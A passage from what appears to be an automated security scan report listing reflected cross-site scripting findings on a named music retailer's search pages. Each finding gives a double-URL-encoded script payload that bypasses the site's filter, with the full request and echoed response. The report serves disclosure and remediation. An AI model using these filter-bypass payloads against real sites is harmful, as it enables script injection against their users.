This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capgun%20Coup1e0a4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b98189875&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cpa16osek4qsfvqk0ncgomehp4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=437010282; expires=Sun, 09-Jan-2011 02:39:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=109102112; expires=Sun, 09-Jan-2011 02:39:39 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capgun Coup1e0a4</title><script>alert(1)</script>2b98189875</title>
...[SNIP]...

1.73. http://www.insound.com/search/query/Capillary%20Action&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capillary%20Action&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14eee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1db6f4912 was submitted in the REST URL parameter 3. This input was echoed as 14eee"><script>alert(1)</script>a1db6f4912 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capillary%20Action14eee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1db6f4912&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ksc1b51m487hvb53rldte4pfo7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=562347066; expires=Sun, 09-Jan-2011 02:39:33 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=381684379; expires=Sun, 09-Jan-2011 02:39:33 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capillary Action14eee"><script>alert(1)</script>a1db6f4912" />
...[SNIP]...

1.74. http://www.insound.com/search/query/Capillary%20Action&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capillary%20Action&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 8010f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0d79cebd7c6 was submitted in the REST URL parameter 3. This input was echoed as 8010f</title><script>alert(1)</script>0d79cebd7c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capillary%20Action8010f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0d79cebd7c6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7p679rjrstnk4nd4jj6gqemgj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=204356903; expires=Sun, 09-Jan-2011 02:39:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=30953910; expires=Sun, 09-Jan-2011 02:39:39 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capillary Action8010f</title><script>alert(1)</script>0d79cebd7c6</title>
...[SNIP]...

1.75. http://www.insound.com/search/query/Capitol%20City%20Dusters&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capitol%20City%20Dusters&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload be42c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9962230acd was submitted in the REST URL parameter 3. This input was echoed as be42c</title><script>alert(1)</script>c9962230acd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capitol%20City%20Dustersbe42c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9962230acd&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=o3jhcmkijvkccgqo9m0bbp85j4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:42 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=238544957; expires=Sun, 09-Jan-2011 02:39:42 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=317659291; expires=Sun, 09-Jan-2011 02:39:42 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capitol City Dustersbe42c</title><script>alert(1)</script>c9962230acd</title>
...[SNIP]...

1.76. http://www.insound.com/search/query/Capitol%20City%20Dusters&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capitol%20City%20Dusters&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd0e8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22e682c610 was submitted in the REST URL parameter 3. This input was echoed as fd0e8"><script>alert(1)</script>22e682c610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capitol%20City%20Dustersfd0e8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22e682c610&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=0kemccb7imolme9nf5ac1gfih4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=235614585; expires=Sun, 09-Jan-2011 02:39:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=382287926; expires=Sun, 09-Jan-2011 02:39:35 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capitol City Dustersfd0e8"><script>alert(1)</script>22e682c610" />
...[SNIP]...

1.77. http://www.insound.com/search/query/Capitol%20K&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capitol%20K&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 82ab8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed63e39fc802 was submitted in the REST URL parameter 3. This input was echoed as 82ab8</title><script>alert(1)</script>d63e39fc802 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capitol%20K82ab8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed63e39fc802&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=77vf9017o4risrl7b0fr2908v5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:44 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=433591705; expires=Sun, 09-Jan-2011 02:39:44 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=359263493; expires=Sun, 09-Jan-2011 02:39:44 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capitol K82ab8</title><script>alert(1)</script>d63e39fc802</title>
...[SNIP]...

1.78. http://www.insound.com/search/query/Capitol%20K&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capitol%20K&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91fab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef962b5e103a was submitted in the REST URL parameter 3. This input was echoed as 91fab"><script>alert(1)</script>f962b5e103a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capitol%20K91fab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef962b5e103a&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=akrp2c5srknd2pv3388nqi9m45; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:37 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=176259706; expires=Sun, 09-Jan-2011 02:39:37 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=541695709; expires=Sun, 09-Jan-2011 02:39:37 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capitol K91fab"><script>alert(1)</script>f962b5e103a" />
...[SNIP]...

1.79. http://www.insound.com/search/query/Capleton%20&%20Jah%20Mali&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capleton%20&%20Jah%20Mali&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69924%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e813b74ec99f was submitted in the REST URL parameter 3. This input was echoed as 69924"><script>alert(1)</script>813b74ec99f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capleton%2069924%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e813b74ec99f&%20Jah%20Mali&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=nl98eni7bgm0kn39m8eq5ts496; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=284904447; expires=Sun, 09-Jan-2011 02:39:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=543920325; expires=Sun, 09-Jan-2011 02:39:40 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capleton 69924"><script>alert(1)</script>813b74ec99f" />
...[SNIP]...

1.80. http://www.insound.com/search/query/Capleton%20&%20Jah%20Mali&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capleton%20&%20Jah%20Mali&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d0a70%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb438cca3dd was submitted in the REST URL parameter 3. This input was echoed as d0a70</title><script>alert(1)</script>b438cca3dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capleton%20d0a70%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb438cca3dd&%20Jah%20Mali&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=bt9sd19op7rqakbmahb5mtgh84; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=554921211; expires=Sun, 09-Jan-2011 02:39:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=533875293; expires=Sun, 09-Jan-2011 02:39:46 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capleton d0a70</title><script>alert(1)</script>b438cca3dd</title>
...[SNIP]...

1.81. http://www.insound.com/search/query/Capleton&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capleton&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e3d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e150de7e4364 was submitted in the REST URL parameter 3. This input was echoed as 3e3d8"><script>alert(1)</script>150de7e4364 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capleton3e3d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e150de7e4364&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=i1rehfcsf82bafo6n79e945nv7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=136571780; expires=Sun, 09-Jan-2011 02:39:40 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=354807980; expires=Sun, 09-Jan-2011 02:39:40 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Capleton3e3d8"><script>alert(1)</script>150de7e4364" />
...[SNIP]...

1.82. http://www.insound.com/search/query/Capleton&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Capleton&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 95b92%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee1c8b3026e9 was submitted in the REST URL parameter 3. This input was echoed as 95b92</title><script>alert(1)</script>e1c8b3026e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Capleton95b92%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee1c8b3026e9&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7i88o6dq1me4e39ngmth849rq1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:47 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=431563513; expires=Sun, 09-Jan-2011 02:39:47 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=538179491; expires=Sun, 09-Jan-2011 02:39:47 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Capleton95b92</title><script>alert(1)</script>e1c8b3026e9</title>
...[SNIP]...

1.83. http://www.insound.com/search/query/Cappadonna&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cappadonna&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload fd721%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1a3d920bd4a was submitted in the REST URL parameter 3. This input was echoed as fd721</title><script>alert(1)</script>1a3d920bd4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cappadonnafd721%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1a3d920bd4a&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=dmpq3vvu6g8jo3ogcl6344as31; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=202638193; expires=Sun, 09-Jan-2011 02:39:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=350828681; expires=Sun, 09-Jan-2011 02:39:41 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cappadonnafd721</title><script>alert(1)</script>1a3d920bd4a</title>
...[SNIP]...

1.84. http://www.insound.com/search/query/Cappadonna&from=47597/ [REST URL parameter 3]  previous  next

